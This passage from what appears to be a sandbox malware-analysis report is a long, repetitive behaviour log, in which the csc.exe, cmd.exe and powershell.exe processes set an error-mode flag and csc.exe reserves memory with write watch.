                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 5740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 71E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 5540000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 7210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6E70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
